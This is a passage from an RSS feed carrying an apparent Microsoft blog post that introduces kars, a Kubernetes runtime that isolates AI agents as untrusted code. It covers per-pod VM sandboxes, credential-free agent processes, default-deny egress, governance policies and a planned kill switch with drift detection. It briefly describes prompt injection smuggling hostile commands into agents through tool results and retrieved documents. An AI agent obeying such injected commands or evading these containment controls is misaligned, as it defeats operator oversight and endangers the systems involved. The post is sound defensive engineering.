data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="18" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="2" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.radapp.io/concepts/resource-types/" target="_blank" rel="noopener"&gt;Radius Resource Types concept&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="18" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="3" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://docs.dapr.io/" target="_blank" rel="noopener"&gt;Dapr documentation&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;UL&gt;
&lt;LI aria-setsize="-1" data-leveltext="" data-font="Symbol" data-listid="18" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;multilevel&amp;quot;}" data-aria-posinset="4" data-aria-level="1"&gt;&lt;A class="lia-external-url" href="https://opensource.microsoft.com/blog/2025/06/30/expanding-platform-engineering-capabilities-with-radius-resource-types/" target="_blank" rel="noopener"&gt;Expanding platform engineering capabilities with Radius Resource Types&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:true,&amp;quot;134233118&amp;quot;:true,&amp;quot;201341983&amp;quot;:0,&amp;quot;335559740&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Thu, 09 Jul 2026 15:53:32 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/designing-for-cloud-sovereignty-with-radius-and-dapr/ba-p/4535067</guid>
      <dc:creator>CollinBrian</dc:creator>
      <dc:date>2026-07-09T15:53:32Z</dc:date>
    </item>
    <item>
      <title>Introducing kars - an Agent Reference Stack for Kubernetes</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/introducing-kars-an-agent-reference-stack-for-kubernetes/ba-p/4529800</link>
      <description>&lt;ARTICLE&gt;&lt;HEADER&gt;&lt;/HEADER&gt;
&lt;P class="lede" style="font-size: 1.25rem; line-height: 1.6; color: #1a1a1a; border-left: 4px solid #0078D4; padding: 0.4rem 0 0.4rem 1.2rem; margin: 1.75rem 0 2rem;"&gt;&lt;EM&gt;kars&lt;/EM&gt; is a Kubernetes-native runtime for AI agents on Azure. It treats every agent as untrusted code: per-pod kernel isolation, zero credentials in the agent process, end-to-end encrypted inter-agent mesh, and native consumption of the &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://microsoft.github.io/agent-governance-toolkit/" target="_blank" rel="noopener"&gt;Microsoft Agent Governance Toolkit&lt;/A&gt;. Agents on any supported framework are governed by one set of Kubernetes policies.&lt;/P&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;This builds on the foundation Brendan Burns described last month - &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://opensource.microsoft.com/blog/2026/05/18/from-open-source-to-agentic-systems-microsoft-at-open-source-summit-north-america-2026/" target="_blank" rel="noopener"&gt;From open source to agentic systems&lt;/A&gt;: a hardened Azure Linux substrate (Azure Linux 4.0 + Azure Container Linux), an open agentic stack (Microsoft Agent Framework, AGT, A2A), and the Agentic AI Foundation.&amp;nbsp;&lt;EM&gt;kars&lt;/EM&gt; is a K8s-native runtime that composes these primitives into a single, deployable stack you can drop into AKS.&lt;/P&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 2.5rem; margin-bottom: 0.75rem; letter-spacing: -0.2px;"&gt;One set of Kubernetes policies governs every agent framework&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;You declare an agent's &lt;STRONG&gt;model, tools, memory, and MCP access&lt;/STRONG&gt; as Kubernetes CRDs - &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;InferencePolicy&lt;/CODE&gt;, &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;ToolPolicy&lt;/CODE&gt;, &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;KarsMemory&lt;/CODE&gt;, &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;McpServer&lt;/CODE&gt; - and the &lt;STRONG&gt;per-pod router enforces them identically for every runtime&lt;/STRONG&gt;, not the framework.&lt;/P&gt;
&lt;UL style="margin: 1rem 0; padding-left: 1.4rem; line-height: 1.7;"&gt;
&lt;LI&gt;&lt;STRONG&gt;One policy language&lt;/STRONG&gt; across OpenClaw, Hermes, LangGraph, MAF and the rest - the runtime can't bypass it.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Team A on harness A, Team B on harness B - one governance surface, one audit trail.&lt;/STRONG&gt; Framework choice stops fragmenting how you govern.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Operate it from the cluster&lt;/STRONG&gt; - GitOps the policies and watch the fleet in the &lt;STRONG&gt;&lt;A class="lia-external-url" href="https://headlamp.dev/" target="_blank" rel="noopener"&gt;Headlamp&lt;/A&gt; plugin&lt;/STRONG&gt; (a Kubernetes dashboard for sandboxes, policy CRDs, and mesh topology) or the &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;kars operator&lt;/CODE&gt; TUI.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P style="margin: 1rem 0 0; line-height: 1.7;"&gt;Governing agents at scale becomes a Kubernetes problem, not an N-frameworks problem.&lt;/P&gt;
&lt;DIV class="tldr" style="background: #1a1a1a; color: #f0f0f0; padding: 1.5rem 1.75rem; border-radius: 10px; margin: 2.25rem 0;"&gt;
&lt;H3 style="font-size: 1.25rem; letter-spacing: 0.5px; color: #4cc2ff; margin-top: 0; margin-bottom: 0.75rem;"&gt;TL;DR&lt;/H3&gt;
&lt;UL style="margin: 0; padding-left: 1.2rem; line-height: 1.7;"&gt;
&lt;LI&gt;&lt;STRONG&gt;What:&lt;/STRONG&gt; Kubernetes operator + per-agent inference router + end-to-end encrypted inter-agent mesh, on AKS. One sandbox per agent.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Why:&lt;/STRONG&gt; an agent's real instructions are assembled at runtime from sources you don't control — model output, tool results, retrieved documents, MCP servers - and prompt injection lets any of them smuggle in hostile commands. So the agent must be treated as untrusted code that runs attacker-influenced instructions, not as trusted first-party software.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;How:&lt;/STRONG&gt; consumes &lt;A style="text-decoration: underline; text-underline-offset: 2px; color: #6cc8ff;" href="https://microsoft.github.io/agent-governance-toolkit/" target="_blank" rel="noopener"&gt;AGT&lt;/A&gt; for governance, runs on the Azure Linux family, opt-in &lt;A style="text-decoration: underline; text-underline-offset: 2px; color: #6cc8ff;" href="https://learn.microsoft.com/en-us/azure/aks/use-pod-sandboxing" target="_blank" rel="noopener"&gt;AKS Pod Sandboxing&lt;/A&gt; (Kata VM isolation) is one CRD field. Eight first-class agent frameworks supported.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Unique today:&lt;/STRONG&gt; end-to-end encrypted inter-&lt;EM&gt;runtime&lt;/EM&gt; messaging - a Python Hermes agent and a TypeScript OpenClaw agent are first-class peers on the same Signal-Protocol mesh (more runtimes landing on it); the broker sees only ciphertext. No other K8s-native agent runtime ships this.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Source:&lt;/STRONG&gt; &lt;A style="text-decoration: underline; text-underline-offset: 2px; color: #6cc8ff;" href="https://github.com/Azure/kars" target="_blank" rel="noopener"&gt;github.com/Azure/kars&lt;/A&gt; · MIT · contributions welcome.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/DIV&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 2.5rem; margin-bottom: 0.75rem; letter-spacing: -0.2px;"&gt;Try it&lt;/H2&gt;
&lt;PRE style="background: #1a1a1a; color: #e6e6e6; padding: 1.25rem 1.4rem; border-radius: 10px; overflow-x: auto; line-height: 1.6; margin: 1rem 0;"&gt;&lt;CODE style="font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace; background: transparent; color: inherit; padding: 0;"&gt;# 1. Install the CLI (Node 22+)
npm install -g @kars-runtime/cli

# 2. Try it on your laptop on a kind cluster that mirrors the AKS layout.
#    kars dev prompts for the model provider.
#    Default sandbox type is OpenClaw.
kars dev --target local-k8s --release

# 3. List your agents and open the web UX with your OpenClaw dev-agent
kars list
kars connect dev-agent

# 4. Review using a CLI-based TUI operator view
kars operator&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;Going to production? &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;kars up&lt;/CODE&gt; provisions the AKS cluster, controller and your first sandbox; Full path in the &lt;A class="lia-external-url" style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/Azure/kars/blob/main/docs/quickstart.md" target="_blank" rel="noopener"&gt;Quickstart guide&lt;/A&gt;.&lt;/P&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;The architecture, in one picture&lt;/H2&gt;
&lt;FIGURE style="margin: 2rem 0; text-align: center;"&gt;
&lt;FIGCAPTION style="font-size: 0.95rem; color: #555; margin-top: 0.8rem; font-style: italic; text-align: center; line-height: 1.6;"&gt;&lt;img /&gt;Figure 1 - Two sandboxes running&amp;nbsp;&lt;EM&gt;different&lt;/EM&gt; agent runtimes (&lt;STRONG&gt;researcher&lt;/STRONG&gt; on OpenClaw in &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;enhanced&lt;/CODE&gt; isolation; &lt;STRONG&gt;writer&lt;/STRONG&gt; on Hermes in &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;confidential&lt;/CODE&gt; Kata VM isolation) talk to each other over the AgentMesh - OpenClaw and Hermes are first-class peers on one Signal-Protocol wire format, with the other adapters landing on it. The Signal session lives inside the agent processes - each agent owns its own session keys; the relay only forwards opaque ciphertext and cannot decrypt. The per-pod router holds the Entra Agent ID and the AGT governance the agent consults on every peer message (trust, capability, policy, audit).&amp;nbsp;&lt;STRONG&gt;kars-sre&lt;/STRONG&gt; is the cluster's own operator agent - same sandbox shape, but with cluster-wide read and gated writes. AGT is consumed for governance.&lt;/FIGCAPTION&gt;
&lt;/FIGURE&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;Why this design&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;Four convictions shaped kars. Each is opinionated; each rejects an assumption I see repeated in the agentic-AI conversation.&lt;/P&gt;
&lt;H4 style="margin: 1.75rem 0 0.5rem; font-size: 1.1rem; color: #0078d4;"&gt;1. The agent is untrusted code, not a microservice.&lt;/H4&gt;
&lt;P style="margin: 0.5rem 0 1rem; line-height: 1.7;"&gt;An agent's real instructions are assembled at runtime from model output, tool responses, and content you don't control — and prompt injection turns any of them into a command. So the agent process holds no secrets, has no ambient network reach, and is isolated at the kernel, not just the network policy.&lt;/P&gt;
&lt;H4 style="margin: 1.75rem 0 0.5rem; font-size: 1.1rem; color: #0078d4;"&gt;2. Delegation is a security boundary, not a function call.&lt;/H4&gt;
&lt;P style="margin: 0.5rem 0 1rem; line-height: 1.7;"&gt;When an agent delegates a sub-task, the sub-agent becomes&amp;nbsp;&lt;STRONG&gt;its own sandbox&lt;/STRONG&gt; - its own pod, network policy, and isolation. The agent has no cluster access; it calls one tool, the router runs a governance check, and the parent scopes the child's model, tools, egress, and token budget - so decomposition and containment are the same act.&lt;/P&gt;
&lt;H4 style="margin: 1.75rem 0 0.5rem; font-size: 1.1rem; color: #0078d4;"&gt;3. Governance is the workload, not a wrapper.&lt;/H4&gt;
&lt;P style="margin: 0.5rem 0 1rem; line-height: 1.7;"&gt;Policy, audit, trust scoring, and rate limiting can't be bolted on later. kars consumes the Microsoft Agent Governance Toolkit (&lt;A class="lia-external-url" href="https://microsoft.github.io/agent-governance-toolkit/" target="_blank" rel="noopener" data-href="https://microsoft.github.io/agent-governance-toolkit/"&gt;AGT&lt;/A&gt;) through stable seams from day one.&lt;/P&gt;
&lt;H4 style="margin: 1.75rem 0 0.5rem; font-size: 1.1rem; color: #0078d4;"&gt;4. In-cluster messaging needs end-to-end encryption and built-in trust.&lt;/H4&gt;
&lt;P style="margin: 0.5rem 0 1rem; line-height: 1.7;"&gt;Inside the cluster, agents talk over&amp;nbsp;&lt;STRONG&gt;AgentMesh&lt;/STRONG&gt;: an end-to-end Signal-Protocol session where the relay routes ciphertext it can't decrypt, and peers establish trust autonomously before connecting. We speak&amp;nbsp;&lt;A class="lia-external-url" href="https://github.com/a2aproject" target="_blank" rel="noopener" data-href="https://a2aproject.dev/"&gt;A2A&lt;/A&gt; too - as the cross-organisation channel for peers outside your kars cluster. Two channels, two trust models.&lt;/P&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;Spotlight - confidential agents in one CRD field&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;Some agentic workloads - financial research, clinical, sovereign deployments, classified evals - need more than a hardened namespace. They need a separate kernel per workload, VM-level isolation, and a barrier between the agent and the host. kars wires this into &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://learn.microsoft.com/en-us/azure/aks/use-pod-sandboxing" target="_blank" rel="noopener"&gt;AKS Pod Sandboxing&lt;/A&gt;.&lt;/P&gt;
&lt;DIV class="spotlight" style="background: #f7fbff; border: 1px solid #cce0f5; border-left: 4px solid #0078D4; border-radius: 10px; padding: 1.4rem 1.6rem; margin: 1.5rem 0;"&gt;
&lt;H4 style="font-size: 0.9rem; text-transform: uppercase; letter-spacing: 0.8px; margin-top: 0; margin-bottom: 0.5rem; color: #0078d4;"&gt;What you write&lt;/H4&gt;
&lt;PRE style="background: #1a1a1a; color: #e6e6e6; padding: 1.25rem 1.4rem; border-radius: 8px; overflow-x: auto; line-height: 1.6; margin: 0.5rem 0 1rem;"&gt;&lt;CODE style="font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace; background: transparent; color: inherit; padding: 0;"&gt;apiVersion: kars.azure.com/v1alpha1
kind: KarsSandbox
metadata:
  name: financial-research
spec:
  runtime:
    kind: OpenClaw
  isolation: confidential   # standard | enhanced | confidential
  #          └─ confidential = Kata VM isolation (AKS Pod Sandboxing)&lt;/CODE&gt;&lt;/PRE&gt;
&lt;H4 style="font-size: 0.9rem; text-transform: uppercase; letter-spacing: 0.8px; margin-top: 1.5rem; margin-bottom: 0.5rem; color: #0078d4;"&gt;What the controller does&lt;/H4&gt;
&lt;UL style="padding-left: 1.4rem; line-height: 1.7; margin: 0.5rem 0;"&gt;
&lt;LI&gt;Sets &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;runtimeClassName: kata-vm-isolation&lt;/CODE&gt; on the pod spec (&lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/Azure/kars/blob/main/controller/src/reconciler/mod.rs#L90" target="_blank" rel="noopener"&gt;controller/src/reconciler/mod.rs&lt;/A&gt;).&lt;/LI&gt;
&lt;LI&gt;Adds a &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;nodeSelector&lt;/CODE&gt; for the &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;sandbox-kata&lt;/CODE&gt; nodepool.&lt;/LI&gt;
&lt;LI&gt;Schedules onto a dedicated Kata nodepool (&lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;workloadRuntime: KataMshvVmIsolation&lt;/CODE&gt;, &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;osSKU: AzureLinux&lt;/CODE&gt;, &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;enableEncryptionAtHost: true&lt;/CODE&gt;) - auto-provisioned by &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;kars up --isolation confidential&lt;/CODE&gt; or &lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;kars add &amp;lt;name&amp;gt; --isolation confidential&lt;/CODE&gt;.&lt;/LI&gt;
&lt;LI&gt;Preserves all the other kars hardening (read-only rootfs, drop-ALL caps, default-deny egress, kars-strict seccomp).&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 style="font-size: 0.9rem; text-transform: uppercase; letter-spacing: 0.8px; margin-top: 1.5rem; margin-bottom: 0.5rem; color: #0078d4;"&gt;What you get&lt;/H4&gt;
&lt;UL style="padding-left: 1.4rem; line-height: 1.7; margin: 0.5rem 0 0;"&gt;
&lt;LI&gt;A dedicated lightweight VM per pod via Kata Containers on Azure Linux, using the Microsoft Hyper-V Hypervisor with the Cloud Hypervisor VMM. Separate kernel per workload - a container escape is trapped in the VM, not the host.&lt;/LI&gt;
&lt;LI&gt;Optionally, pinning the Kata nodepool to AMD SEV-SNP-capable confidential-compute VMs (&lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;Standard_DC4as_v5&lt;/CODE&gt;) adds hardware-backed memory encryption on top of the VM boundary.&lt;/LI&gt;
&lt;LI&gt;A working example at &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/Azure/kars/tree/main/examples/confidential-agent" target="_blank" rel="noopener"&gt;&lt;CODE style="background: #eef4fb; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;examples/confidential-agent/&lt;/CODE&gt;&lt;/A&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/DIV&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;The trust boundary becomes: &lt;EM&gt;the workload runs in its own hypervisor-isolated VM with a separate kernel; the host kernel is not in the trust set&lt;/EM&gt;. Everything else about the agent - framework, model, policy bundle, mesh - works exactly the same. One field changes.&lt;/P&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;How kars fits the broader open agentic stack&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;It's a fair question, so here's the honest version: kars is a &lt;EM&gt;consumer and composer&lt;/EM&gt; of the open primitives, not a competitor to them. The governance layer is the clearest example - kars doesn't reinvent policy, audit, signing, or the encrypted mesh. It plugs into Microsoft's &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://microsoft.github.io/agent-governance-toolkit/" target="_blank" rel="noopener"&gt;Agent Governance Toolkit&lt;/A&gt; through four stable seams (mesh, policy, audit, and signing; the mesh runs on AGT's &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;agentmesh = "4.0.0"&lt;/CODE&gt; crate), and when we hit a gap we fix it upstream rather than fork - that's what PRs &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/microsoft/agent-governance-toolkit/pull/2090" target="_blank" rel="noopener"&gt;#2090&lt;/A&gt;, &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/microsoft/agent-governance-toolkit/pull/2659" target="_blank" rel="noopener"&gt;#2659&lt;/A&gt; and &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/microsoft/agent-governance-toolkit/pull/2719" target="_blank" rel="noopener"&gt;#2719&lt;/A&gt; were. The &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://learn.microsoft.com/en-us/agent-framework/" target="_blank" rel="noopener"&gt;Microsoft Agent Framework&lt;/A&gt; already runs as a first-class kars runtime, and &lt;A class="lia-external-url" style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/a2aproject" target="_blank" rel="noopener"&gt;A2A&lt;/A&gt; is live as an inbound gateway with an mTLS-pinned subject for cross-org traffic.&lt;/P&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;This space is young and moving fast, and a lot of good work is happening in the open - Kubernetes SIG's &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/kubernetes-sigs/agent-sandbox" target="_blank" rel="noopener"&gt;&lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;sigs/agent-sandbox&lt;/CODE&gt;&lt;/A&gt;, &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://kagent.dev" target="_blank" rel="noopener"&gt;kagent&lt;/A&gt;, &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://agentgateway.dev/" target="_blank" rel="noopener"&gt;agentgateway&lt;/A&gt;. Our stance is simple: move at pace and align upstream over time. The long-term goal is genuine convergence on the shared open primitives, not a parallel stack. Underneath it all, the substrate is the Azure Linux family (ACL and AL4 distroless as they reach AKS-stable), and the plain Kubernetes baseline - Pod Security Admission, NetworkPolicy, seccomp, sidecars - is a hard requirement we never replace.&lt;/P&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;What's planned&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;A few things high on the near-term roadmap:&lt;/P&gt;
&lt;UL style="padding-left: 1.4rem; line-height: 1.7;"&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://github.com/kaito-project/airunway" target="_blank" rel="noopener"&gt;airunway&lt;/A&gt; support for inference provider&lt;/LI&gt;
&lt;LI&gt;Azure Linux 4 based distroless images (currently based on Azure Linux 3 distroless)&lt;/LI&gt;
&lt;LI&gt;Per-agent&amp;nbsp;&lt;STRONG&gt;Autonomy Tiers (1..5)&lt;/STRONG&gt; with default policy bundles - closes the uniform-governance failure mode.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Multi-cloud LLM providers&lt;/STRONG&gt; + native guardrails (Anthropic, Bedrock, Vertex, Ollama, vLLM; Bedrock Guardrails, Model Armor, OpenAI Moderation).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Per-team virtual keys + unified action-cost ledger&lt;/STRONG&gt; (model + tool + MCP + mesh + spawn) with a Grafana dashboard.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;&lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;KarsKillSwitch&lt;/CODE&gt; CRD + behavioural drift detection + SLO→AGT-quarantine&lt;/STRONG&gt; - one-CRD emergency pause; AGT does the actual termination.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Developer experience layer:&lt;/STRONG&gt; &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;KarsRecipe&lt;/CODE&gt; + &lt;CODE style="background: #f2f4f7; padding: 0.1rem 0.4rem; border-radius: 4px; font-size: 0.9em; font-family: 'Cascadia Code', 'SF Mono', Menlo, Consolas, monospace;"&gt;KarsTask&lt;/CODE&gt; CRDs, browser conversation ingress, Web UI.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 style="font-size: 1.5rem; margin-top: 3rem; border-bottom: 2px solid #ececec; padding-bottom: 0.45rem; letter-spacing: -0.2px;"&gt;Come build with us&lt;/H2&gt;
&lt;P style="margin: 1rem 0; line-height: 1.7;"&gt;The codebase is at &lt;A style="color: #0067c0; text-decoration: underline; text-underline-offset: 2px;" href="https://github.com/Azure/kars" target="_blank" rel="noopener"&gt;github.com/Azure/kars&lt;/A&gt;, MIT-licensed. The most useful contributions would be:&lt;/P&gt;
&lt;H4 style="font-size: 0.9rem; margin-top: 1.5rem; margin-bottom: 0.5rem; text-transform: uppercase; letter-spacing: 0.8px; color: #555;"&gt;Where we want help&lt;/H4&gt;
&lt;UL style="padding-left: 1.4rem; line-height: 1.7;"&gt;
&lt;LI&gt;Testing, validation across different environments and continuous feedback&lt;/LI&gt;
&lt;LI&gt;Parity across all runtime adapters and expand with additional adapters based on demand&lt;/LI&gt;
&lt;LI&gt;A2A interop (the structured handshake from AgentMesh to external A2A peers).&lt;/LI&gt;
&lt;LI&gt;Behavioural-drift detection over the mesh + tool-call telemetry.&lt;/LI&gt;
&lt;LI&gt;Per-agent developer ingress for in-cluster chat / sessions / artifact retrieval.&lt;/LI&gt;
&lt;LI&gt;OWASP Agentic AI Top 10 and NIST AI RMF mapping artifacts.&lt;/LI&gt;
&lt;LI&gt;GKE / EKS deployment validation.&lt;/LI&gt;
&lt;LI&gt;Security review and red-team scenarios.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H4 style="font-size: 0.9rem; margin-top: 1.5rem; margin-bottom: 0.5rem; text-transform: uppercase; letter-spacing: 0.8px; color: #555;"&gt;Some invariants are non-negotiable&lt;/H4&gt;
